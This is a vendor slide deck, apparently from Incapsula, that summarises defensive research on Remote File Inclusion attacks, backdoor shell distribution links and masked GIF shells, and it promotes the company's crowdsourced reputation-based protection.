We are introducing new security algorithms to further improve our Remote File Inclusion (RFI) protective measures. These new security features leverage Incapsula's native crowdsourcing capabilities to gain intelligence about Backdoor shells, RFI attack patterns and zero-day threats. The technology behind our reputation-based algorithms is based on a security research of billions of web sessions over a 6-month period. This research yielded some interesting facts about RFI attacks, which we documented for the benefit of whitehats, developers and website owners.

1. RFI Attacks
in the Security Landscape
Incapsula: Website Security and Acceleration

2. Methodology
• The following facts and figures are based on data from
billions of sessions, which were managed by Incapsula’s
CDN, over a 6-month period.
• Session data was collected and analyzed by Incapsula’s
proprietary traffic profiling security algorithms.
• Links lifespan information is based on a sampled data
from a group of 1,000 RFI links, which carry 226 different
types of backdoor shells and shell variants.
• All data was aggregated from Incapsula’s crowd-sourced
database, dedicated to an ongoing research of RFI attacks
and backdoor shell behavior.

3. Attack Description
Remote File Inclusion (RFI)
attacks abuse user-input and
file-validation vulnerabilities to
upload a malicious payload from
a remote location.
With such shells, an attacker's
goal is to circumvent all security
measures by gaining high-
privileged access to
website, web application and
web hosting server controls.

4. • RFI attacks are popular for their ease of automation and high damage potential.
• RFI circumvents other security measures, offering the best ROI for an attacker.
• RFI attacks are executed via widely available automated tools.

5. • Many websites still carry known/patched RFI vulnerabilities.
• Patching is not an effective wide-scale solution.
• Compromised websites are hijacked for malware distribution and DDoS attacks.
• Compromised site is a persistent threat to itself, its visitor and other websites.

6. • RFI links serve as centralized distributers of Backdoor Shells.
• Many RFI links are re-used for multiple attacks, with different attacks vectors,
on various targets.
• The lifespan of RFI links averages over 60 days, making them great candidates
for long-term intelligence gathering.

7. • High-visibility RFI attacks will result in defacement or manipulation of content.
• The attacker will often prefer a more subtle approach, using the compromised
site as long-term resource for DDoS, data-theft and malware distribution.
• One compromised site can endanger the whole server!

8. • Masked Gif files are the “backdoor of choice” for RFI attacks.
• Gif’s popularity is influenced by the popularity of TimThumb vulnerability.
• Gif’s are used to mask large shells and droppers alike.

9. Conclusions
• Signature-based methods are effective against most RFIs but not against
Zero-day threat.
• Patching is not an effective wide-scale solution.
• RFI links’ lifespan, and their position as centralized distribution points, offer
many benefits for Whitehats.
• Data from RFI links can be harvested for reputation-based algorithms, to
hardening RFI and Backdoor protection.
• Data from RFI links can be used as a backbone for an effective early warning
system for unique zero-day threats.
• Incapsula’s native crowdsourcing functionalities, coupled with its access control
capabilities, are extremely well-suited for RFI link monitoring and reputation-
based mitigation.

10. Learn More
For more information about RFI attacks and Incapsula’s unique
crowdsourcing security visit:
• http://www.Incapsula.com
• http://www.incapsula.com/the-incapsula-blog/item/801-
crowdsourced-security-rfi-protection
• http://www.incapsula.com/the-incapsula-blog/item/802-rfi-
attacks-in-the-security-threat-landscape
or contact us at: Info@Incapsula.com

11. Stay Safe